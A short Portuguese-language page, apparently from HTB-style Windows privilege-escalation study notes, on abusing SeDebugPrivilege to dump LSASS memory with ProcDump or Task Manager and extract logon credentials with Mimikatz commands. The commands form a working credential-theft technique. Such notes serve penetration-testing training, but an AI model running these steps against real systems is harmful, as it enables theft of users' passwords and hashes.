SeeDebugPrivilege

Para executar um aplicativo ou serviço específico ou auxiliar na resolução de problemas, um usuário pode receber o privilégio SeDebugPrivilege em vez de ser adicionado ao grupo de administradores.

Após fazer login como um usuário com os Debug programsdireitos atribuídos e abrir um shell com privilégios elevados, vemos SeDebugPrivilegeque está listado.

whoami /priv

Podemos usar o ProcDump do pacote SysInternals para aproveitar esse privilégio e despejar a memória do processo.

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Se isso for bem-sucedido podemos carregar o sistema Mimikatz usando o sekurlsa::minidump comando

C:\htb> mimikatz.exe
mimikatz # log
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords

Suponha que, por algum motivo, não seja possível instalar as ferramentas no alvo, mas tenhamos acesso RDP:

Abrir o Gerenciador de Tarefas
Ir para a aba Detalhes (Details)
Localizar o processo LSASS (lsass.exe)
Clicar com o botão direito no processo
Selecionar “Criar arquivo de despejo de memória” (Create dump file)
Aguardar a geração do arquivo dump
Copiar/transferir o arquivo para a máquina atacante
Abrir o arquivo usando o Mimikatz
Extrair as credenciais a partir do dump

PreviousSeImpersonate and SeAssignPrimaryToken NextSeTakeOwnershipPrivilege

Last updated 4 days ago